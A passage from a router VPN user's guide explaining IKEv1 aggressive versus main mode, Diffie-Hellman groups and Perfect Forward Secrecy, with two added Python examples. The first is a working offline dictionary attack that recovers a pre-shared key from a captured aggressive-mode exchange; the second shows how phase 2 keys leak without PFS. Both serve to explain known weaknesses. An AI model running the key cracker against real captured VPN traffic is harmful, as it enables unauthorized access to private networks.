User's guide

Aggressive mode was developed to allow the host to identify a remote unit (the initiator)
from an ID string rather than from its IP address. This means that it can be used over
the Internet via an ISP that dynamically allocates IP addresses. It also has two other
noticeable differences from main mode. Firstly, it uses fewer messages to complete the
phase 1 exchange (3 compared to 6) and so will execute a little more quickly, particularly
on networks with large turn-around delays such as GPRS. Secondly, more information is
sent unencrypted during the exchange: the identities of both units travel in the clear, and
when pre-shared key authentication is used the responder's authentication hash in the
second message is computed from the pre-shared key together with values that are all
visible on the wire. Anyone who captures the exchange can therefore test candidate
pre-shared keys against it offline, so aggressive mode is less secure than a main mode
exchange and any pre-shared key used with it should be long and random.
Note:
Main mode can also be used without knowing the remote unit's IP address when
certificates are used for authentication. This is because the remote unit's identity is taken
from the certificate it presents (which carries its public key) rather than from its IP
address.
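The offline attack on a pre-shared key that the paragraph above alludes to, as an added example that is not part of the user's guide or the router firmware. It reproduces the RFC 2409 formulas for SKEYID and HASH_R (HMAC-SHA1 is assumed as the negotiated hash) over the real 768-bit MODP group 1 prime; the cookies, nonces, SA body, identities and word list are constructed for this example.

```python
"""Why IKEv1 aggressive mode with a pre-shared key is weaker than main mode.

Added example; not code from the user's guide or the router firmware. The
formulas follow RFC 2409 (prf = HMAC-SHA1 assumed); all captured values are
constructed here.
"""
import hashlib
import hmac
import secrets
from typing import Optional

# IKE MODP group 1: 768-bit prime and generator 2 (RFC 2409 section 6.1).
P = int(
    "FFFFFFFFFFFFFFFFC90FDAA22168C234C4C6628B80DC1CD129024E088A67CC74"
    "020BBEA63B139B22514A08798E3404DDEF9519B3CD3A431B302B0A6DF25F1437"
    "4FE1356D6D51C245E485B576625E7EC6F44C42E9A63A3620FFFFFFFFFFFFFFFF", 16)
G = 2


def prf(key: bytes, data: bytes) -> bytes:
    """IKEv1 prf: HMAC with the negotiated hash, here SHA-1 (RFC 2409 s.5)."""
    return hmac.new(key, data, hashlib.sha1).digest()


def i2b(n: int) -> bytes:
    """Big-endian encoding of a Diffie-Hellman public value."""
    return n.to_bytes((n.bit_length() + 7) // 8, "big")


def responder_hash(psk, ni, nr, gxr, gxi, cky_r, cky_i, sa_i, id_r) -> bytes:
    """HASH_R as the responder sends it in aggressive-mode message 2.

    SKEYID = prf(pre-shared-key, Ni_b | Nr_b)
    HASH_R = prf(SKEYID, g^xr | g^xi | CKY-R | CKY-I | SAi_b | IDir_b)
    Every input except the pre-shared key is carried in the clear in
    messages 1 and 2.
    """
    skeyid = prf(psk, ni + nr)
    return prf(skeyid, gxr + gxi + cky_r + cky_i + sa_i + id_r)


def aggressive_mode_capture(psk: bytes) -> dict:
    """What a passive observer records from aggressive-mode messages 1 and 2.

    The private exponents xi and xr never leave the peers; everything
    returned below does.
    """
    xi = secrets.randbelow(P - 2) + 1
    xr = secrets.randbelow(P - 2) + 1
    ni, nr = secrets.token_bytes(16), secrets.token_bytes(16)
    cky_i, cky_r = secrets.token_bytes(8), secrets.token_bytes(8)
    # Constructed stand-ins for the SA payload body and the ID payloads
    # (first byte 3 = ID_USER_FQDN, 2 = ID_FQDN).
    sa_i = bytes.fromhex("0000000100000001000000280101000100000020")
    id_i = b"\x03\x00\x00\x00" + b"branch-router@example.com"
    id_r = b"\x02\x00\x00\x00" + b"hq-vpn.example.com"
    gxi, gxr = i2b(pow(G, xi, P)), i2b(pow(G, xr, P))
    return {
        "msg1": {"cky_i": cky_i, "sa_i": sa_i, "ke_i": gxi, "ni": ni, "id_i": id_i},
        "msg2": {"cky_r": cky_r, "ke_r": gxr, "nr": nr, "id_r": id_r,
                 "hash_r": responder_hash(psk, ni, nr, gxr, gxi,
                                          cky_r, cky_i, sa_i, id_r)},
    }


def crack_psk(capture: dict, wordlist) -> Optional[bytes]:
    """Offline dictionary attack on a captured aggressive-mode exchange.

    Each candidate key is used to recompute HASH_R from the cleartext fields;
    a match confirms the key without ever talking to either peer.
    """
    m1, m2 = capture["msg1"], capture["msg2"]
    for candidate in wordlist:
        guess = responder_hash(candidate, m1["ni"], m2["nr"], m2["ke_r"],
                               m1["ke_i"], m2["cky_r"], m1["cky_i"],
                               m1["sa_i"], m2["id_r"])
        if hmac.compare_digest(guess, m2["hash_r"]):
            return candidate
    return None


# Constructed word list for the demonstration.
WORDLIST = [b"password", b"vpn1234", b"letmein", b"Summer2009", b"changeme"]

if __name__ == "__main__":
    capture = aggressive_mode_capture(b"Summer2009")
    print("recovered pre-shared key:", crack_psk(capture, WORDLIST))
```

In main mode the ID and HASH payloads are only sent in messages 5 and 6, after they have been encrypted under keys that themselves depend on the pre-shared key, so a passive capture gives nothing for this loop to test against. The attack needs no interaction with either unit, which is why the guide's warning about aggressive mode applies even to units that are never probed directly.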
MODP Group for Phase 1
Sets the size of the modulus used in the IKE Diffie-Hellman exchange to 768 bits (group 1)
or 1024 bits (group 2). By default this option is set to group 1. Group 2 gives a stronger
exchange at the cost of slower phase 1 key generation: on this unit typically 4-5 seconds
for group 2 compared with 1-2 seconds for group 1. Note that 768-bit Diffie-Hellman
(group 1) is no longer regarded as adequate against a well-resourced attacker, so group 2
should be selected wherever the remote unit supports it and the extra delay is acceptable.
MODP Group for Phase 2
Sets the Diffie-Hellman group, and hence the size of the modulus, used for Perfect
Forward Secrecy in phase 2 of the security exchange.
With "No PFS" (Perfect Forward Secrecy) selected, the keying material derived during
phase 1 is reused to generate the keys for the phase 2 SAs (hence speeding up
connections). The drawback is that the phase 2 keys then depend entirely on the phase 1
secret: if the phase 1 keying material were compromised (i.e. discovered by a third party),
every phase 2 key derived from it could be recovered, including the keys that protected
traffic recorded earlier.
Selecting group 1 (768), 2 (1024) or 3 (1536) forces a second Diffie-Hellman exchange
during phase 2, so that the phase 2 keys are derived from fresh data that cannot be
recovered from the phase 1 secret alone. This provides a greater level of security but of
course takes longer to complete, and the group selected must match the setting on the
remote unit.
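The difference between "No PFS" and a phase 2 Diffie-Hellman group, shown as an added example that is not part of the user's guide or the router firmware. It follows the RFC 2409 section 5.5 KEYMAT derivation with and without a quick-mode Diffie-Hellman exchange; HMAC-SHA1 as the prf, MODP group 1 for the exchange, and the pre-shared key, cookies, nonces and SPI are all assumptions constructed for the example. The attacker modelled is one who has already obtained the phase 1 keys and can therefore read the phase 2 messages.

```python
"""Why "No PFS" ties every phase 2 key to the phase 1 secret.

Added example; not code from the user's guide or the router firmware. KEYMAT
formulas follow RFC 2409 section 5.5 (prf = HMAC-SHA1 assumed); the PSK,
cookies, nonces and SPI are constructed here.
"""
import hashlib
import hmac
import secrets

# IKE MODP group 1: 768-bit prime and generator 2 (RFC 2409 section 6.1).
P = int(
    "FFFFFFFFFFFFFFFFC90FDAA22168C234C4C6628B80DC1CD129024E088A67CC74"
    "020BBEA63B139B22514A08798E3404DDEF9519B3CD3A431B302B0A6DF25F1437"
    "4FE1356D6D51C245E485B576625E7EC6F44C42E9A63A3620FFFFFFFFFFFFFFFF", 16)
G = 2
PROTO_IPSEC_ESP = b"\x03"  # protocol identifier fed into the KEYMAT derivation


def prf(key: bytes, data: bytes) -> bytes:
    """IKEv1 prf: HMAC with the negotiated hash, here SHA-1."""
    return hmac.new(key, data, hashlib.sha1).digest()


def i2b(n: int) -> bytes:
    return n.to_bytes((n.bit_length() + 7) // 8, "big")


def dh_pair():
    """Fresh private exponent and its public value g^x mod p."""
    x = secrets.randbelow(P - 2) + 1
    return x, pow(G, x, P)


def phase1_skeyid_d() -> bytes:
    """Long-lived phase 1 secret: SKEYID_d = prf(SKEYID, g^xy | CKY-I | CKY-R | 0).

    SKEYID for pre-shared key authentication is prf(PSK, Ni_b | Nr_b); the
    PSK and nonces are constructed for the example.
    """
    xi, _gxi = dh_pair()
    _xr, gxr = dh_pair()
    gxy = i2b(pow(gxr, xi, P))
    skeyid = prf(b"constructed-psk", secrets.token_bytes(16) + secrets.token_bytes(16))
    cky_i, cky_r = secrets.token_bytes(8), secrets.token_bytes(8)
    return prf(skeyid, gxy + cky_i + cky_r + b"\x00")


def keymat(skeyid_d, proto, spi, ni, nr, g_qm_xy=b"") -> bytes:
    """KEYMAT = prf(SKEYID_d, [g(qm)^xy |] protocol | SPI | Ni_b | Nr_b).

    The bracketed term is present only when a phase 2 (quick mode) group is
    configured; with "No PFS" it is empty.
    """
    return prf(skeyid_d, g_qm_xy + proto + spi + ni + nr)


def quick_mode(skeyid_d: bytes, pfs: bool):
    """Run phase 2 and return (SA key, payloads readable with the phase 1 keys)."""
    ni, nr = secrets.token_bytes(16), secrets.token_bytes(16)
    spi = secrets.token_bytes(4)
    seen = {"proto": PROTO_IPSEC_ESP, "spi": spi, "ni": ni, "nr": nr}
    if not pfs:
        return keymat(skeyid_d, PROTO_IPSEC_ESP, spi, ni, nr), seen
    x, gx = dh_pair()
    y, gy = dh_pair()
    seen["ke_i"], seen["ke_r"] = i2b(gx), i2b(gy)  # only the public values are sent
    shared = i2b(pow(gy, x, P))
    del x, y  # private exponents are wiped by the peers and never transmitted
    return keymat(skeyid_d, PROTO_IPSEC_ESP, spi, ni, nr, shared), seen


def attacker_keymat(skeyid_d: bytes, seen: dict):
    """Attacker holding the phase 1 keys rebuilds the phase 2 key if he can."""
    if "ke_i" in seen:
        # Needs g(qm)^xy, but only g^x and g^y were observed; deriving g^xy
        # from them is the Diffie-Hellman problem, so the key is out of reach.
        return None
    return keymat(skeyid_d, seen["proto"], seen["spi"], seen["ni"], seen["nr"])


def phase2_key_recoverable(pfs: bool) -> bool:
    """True if a phase 1 compromise also hands over the phase 2 SA key."""
    skeyid_d = phase1_skeyid_d()
    real_key, seen = quick_mode(skeyid_d, pfs)
    return attacker_keymat(skeyid_d, seen) == real_key


if __name__ == "__main__":
    print("No PFS, phase 2 key recoverable:", phase2_key_recoverable(False))
    print("PFS group set, phase 2 key recoverable:", phase2_key_recoverable(True))
```

Because every phase 2 SA negotiated under one phase 1 SA shares the same SKEYID_d, a single phase 1 compromise in the "No PFS" case exposes all of them at once, which is what the extra quick-mode exchange (and its extra delay) buys protection against.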
Renegotiate after h hrs m mins s secs
Determines how long the initial IKE Security Association will stay in force. When it expires,
any attempt to send packets to the remote system will result in IKE attempting to establish
a new SA.